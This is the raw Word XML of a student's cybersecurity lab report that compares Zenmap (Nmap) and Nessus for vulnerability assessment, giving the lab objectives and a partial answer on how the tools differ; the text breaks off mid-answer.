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75076" w14:textId="656649C2" w:rsidR="00D34FE1" w:rsidRPr="005810C8" w:rsidRDefault="003F64B3" w:rsidP="00EC6360">
      <w:pPr>
        <w:spacing w:before="288"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab #</w:t>
      </w:r>
      <w:r w:rsidR="002E6699" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EC6360" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to Identify Risks, Threats &amp; Vulnerabilities in an IT Infrastructure using Zenmap GUI (Nmap) &amp; Nessus Reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32517FDF" w14:textId="1E45F8A1" w:rsidR="005863A8" w:rsidRPr="005810C8" w:rsidRDefault="003F64B3" w:rsidP="00D34FE1">
      <w:pPr>
        <w:spacing w:before="288"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Course Name: </w:t>
      </w:r>
      <w:r w:rsidR="00A707DC" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004853B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IAA202</w:t>
      </w:r>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46836B7D" w14:textId="1AC7ACCA" w:rsidR="005863A8" w:rsidRPr="005810C8" w:rsidRDefault="003F64B3" w:rsidP="00D34FE1">
      <w:pPr>
        <w:spacing w:before="288"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Student Name: </w:t>
      </w:r>
      <w:r w:rsidR="002E6699" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004853B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trần Minh Triết</w:t>
      </w:r>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">___________________________________________________    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EDBDC8" w14:textId="72746867" w:rsidR="003F64B3" w:rsidRPr="005810C8" w:rsidRDefault="003F64B3" w:rsidP="00D34FE1">
      <w:pPr>
        <w:spacing w:before="288"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Due Date: </w:t>
      </w:r>
      <w:r w:rsidR="00A707DC" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004853B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>06/07/2023</w:t>
      </w:r>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">_____________________________________________________ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A58F3" w14:textId="77777777" w:rsidR="000706B5" w:rsidRPr="005810C8" w:rsidRDefault="000706B5" w:rsidP="003F64B3">
      <w:pPr>
        <w:spacing w:before="288"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE466AA" w14:textId="5281333E" w:rsidR="001E0E35" w:rsidRPr="005810C8" w:rsidRDefault="001E0E35" w:rsidP="00DB4629">
      <w:pPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Learning </w:t>
      </w:r>
      <w:r w:rsidR="0035312C" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>objectives and outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64435C33" w14:textId="77777777" w:rsidR="001E0E35" w:rsidRPr="005810C8" w:rsidRDefault="001E0E35" w:rsidP="00DB4629">
      <w:pPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Upon completing this lab, students will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18235AE1" w14:textId="46B90745" w:rsidR="001E0E35" w:rsidRPr="005810C8" w:rsidRDefault="001E0E35" w:rsidP="005810C8">
      <w:pPr>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>• Review a Zenmap GUI (Nmap) network discovery and port scanning report and a Nessus software vulnerability report from a risk management perspective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FEF90B" w14:textId="50406B74" w:rsidR="001E0E35" w:rsidRPr="005810C8" w:rsidRDefault="001E0E35" w:rsidP="005810C8">
      <w:pPr>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>• Identify hosts, operating systems, services, applications, and open ports on devices from the Zenmap GUI (Nmap) scan report from a risk management perspective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385AD511" w14:textId="1D8890E0" w:rsidR="001E0E35" w:rsidRPr="005810C8" w:rsidRDefault="001E0E35" w:rsidP="005810C8">
      <w:pPr>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>• Identify critical, major, and minor software vulnerabilities from the Nessus vulnerability assessment scan report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BFBC0B" w14:textId="149D1D9A" w:rsidR="001E0E35" w:rsidRPr="005810C8" w:rsidRDefault="001E0E35" w:rsidP="005810C8">
      <w:pPr>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>• Assess the exploit potential of the identified software vulnerabilities by conducting a high-level risk impact by visiting the Common Vulnerabilities &amp; Exposures (CVE) online listing of software vulnerabilities at http://cve.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDB8CEC" w14:textId="71BE7DEE" w:rsidR="005863A8" w:rsidRPr="005810C8" w:rsidRDefault="001E0E35" w:rsidP="005810C8">
      <w:pPr>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>• Craft an executive summary prioritizing the identified critical and major threats andvulnerabilities and their risk impact on the IT organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAE1748" w14:textId="77777777" w:rsidR="002E6699" w:rsidRPr="005810C8" w:rsidRDefault="002E6699" w:rsidP="00DB4629">
      <w:pPr>
        <w:ind w:left="0" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED0A062" w14:textId="725C630A" w:rsidR="00873358" w:rsidRPr="005810C8" w:rsidRDefault="002E6699" w:rsidP="00DB4629">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Required </w:t>
      </w:r>
      <w:r w:rsidR="0035312C" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>setup and tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FE2A92" w14:textId="11543590" w:rsidR="00E64AC0" w:rsidRPr="005810C8" w:rsidRDefault="00E64AC0" w:rsidP="005810C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zenmap GUI (Nmap)</w:t>
      </w:r>
      <w:r w:rsidR="00031B17" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00031B17" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>https://nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ECA903" w14:textId="30E996ED" w:rsidR="00DB4629" w:rsidRPr="005810C8" w:rsidRDefault="00E47327" w:rsidP="005810C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nessus Vulnerability Assessment</w:t>
      </w:r>
      <w:r w:rsidR="00031B17" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008A5948" w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>https://www.tenable.com/products/nessus (trial professional version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340F1C7" w14:textId="77777777" w:rsidR="00DB4629" w:rsidRPr="005810C8" w:rsidRDefault="00DB4629" w:rsidP="005810C8">
      <w:pPr>
        <w:ind w:left="426" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2069F7F5" w14:textId="77777777" w:rsidR="00DB4629" w:rsidRPr="005810C8" w:rsidRDefault="00DB4629" w:rsidP="00DB4629">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005810C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab Assessment Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5A4866" w14:textId="3818244F" w:rsidR="00DB4629" w:rsidRPr="00D020D3" w:rsidRDefault="00DB4629"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What are the differences between Ze</w:t>
      </w:r>
      <w:r w:rsidR="000642AC" w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>map GUI (Nmap) and Nessus?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5655338A" w14:textId="3B8622A5" w:rsidR="007260EE" w:rsidRPr="00F32045" w:rsidRDefault="007260EE" w:rsidP="007260EE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F32045">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B39E9" w14:textId="77777777" w:rsidR="008547A0" w:rsidRDefault="00722CC6" w:rsidP="000F214A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00722CC6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Zenmap GUI and Nessus are both popular tools used for network scanning and vulnerability assessment, but they differ in several key aspects. Here are the main differences between Zenmap GUI (Nmap) and Nessus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A5404" w14:textId="77777777" w:rsidR="008547A0" w:rsidRDefault="008547A0" w:rsidP="000F214A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78862221" w14:textId="563F5AC6" w:rsidR="00722CC6" w:rsidRPr="00722CC6" w:rsidRDefault="00722CC6" w:rsidP="008547A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00722CC6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1. Purpose and Focus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD843F3" w14:textId="7733B854"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Zenmap GUI: Zenmap is a graphical user interface (GUI) for Nmap, which is a powerful open-source network scanning tool. Nmap is primarily designed for network exploration and security auditing. It provides comprehensive port scanning, host discovery, and service enumeration capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB393C7" w14:textId="4A9F0375"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Nessus: Nessus is a commercial vulnerability scanner developed by Tenable. Its primary focus is on identifying vulnerabilities and misconfigurations in network devices, operating systems, applications, and databases. Nessus provides detailed vulnerability assessments and generates reports with prioritized remediation suggestions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31698F03" w14:textId="77777777" w:rsidR="008547A0" w:rsidRDefault="008547A0" w:rsidP="008547A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DCBF424" w14:textId="51547DC3" w:rsidR="00722CC6" w:rsidRPr="00722CC6" w:rsidRDefault="00722CC6" w:rsidP="008547A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00722CC6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2. Licensing and Cost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4461FF51" w14:textId="51BED648"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Zenmap GUI: Zenmap is an open-source tool and is available for free. It is distributed as part of the Nmap project, which is also open-source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8C922D" w14:textId="330E56F4"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Nessus: Nessus is a commercial tool that requires a license to use. Tenable offers different editions of Nessus, including a free version called "Nessus Essentials" with limited functionality, and various paid editions with additional features and support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D0BAAF" w14:textId="77777777" w:rsidR="00722CC6" w:rsidRPr="00722CC6" w:rsidRDefault="00722CC6" w:rsidP="00722CC6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F96D2F8" w14:textId="77777777" w:rsidR="00722CC6" w:rsidRPr="00722CC6" w:rsidRDefault="00722CC6" w:rsidP="008547A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00722CC6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3. User Interface and Ease of Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082856A1" w14:textId="27ED2417"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Zenmap GUI: Zenmap provides a user-friendly graphical interface that simplifies the process of running Nmap scans. It offers various scan profiles, scan result visualization, and filtering options, making it easier for both beginners and experienced users to work with Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E900C93" w14:textId="20D9F4B2"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Nessus: Nessus also offers a graphical user interface that allows users to configure and run scans, view scan results, and generate reports. While it provides a range of advanced features, the interface can be more complex compared to Zenmap due to the extensive functionality and customization options available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473F0BB7" w14:textId="77777777" w:rsidR="00722CC6" w:rsidRPr="00722CC6" w:rsidRDefault="00722CC6" w:rsidP="00722CC6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B13AAE" w14:textId="77777777" w:rsidR="00722CC6" w:rsidRPr="00722CC6" w:rsidRDefault="00722CC6" w:rsidP="008547A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00722CC6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>4. Scanning Capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2224FED4" w14:textId="145CE2CB"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lastRenderedPageBreak/>
        <w:t>- Zenmap GUI: Zenmap is primarily focused on network exploration and offers a wide range of scanning techniques, including host discovery, port scanning (TCP, UDP, SCTP), version detection, and OS fingerprinting. It allows users to create custom scan profiles and specify various options to customize the scan behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0050C7C9" w14:textId="0CF33EF6"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Nessus: Nessus is specifically designed for vulnerability assessment and goes beyond simple port scanning. It employs a wide range of active and passive vulnerability detection techniques to identify security weaknesses, such as missing patches, misconfigurations, weak passwords, and insecure network services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D2969" w14:textId="77777777" w:rsidR="00722CC6" w:rsidRPr="00722CC6" w:rsidRDefault="00722CC6" w:rsidP="00722CC6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31FA6E40" w14:textId="77777777" w:rsidR="00722CC6" w:rsidRPr="00722CC6" w:rsidRDefault="00722CC6" w:rsidP="008547A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
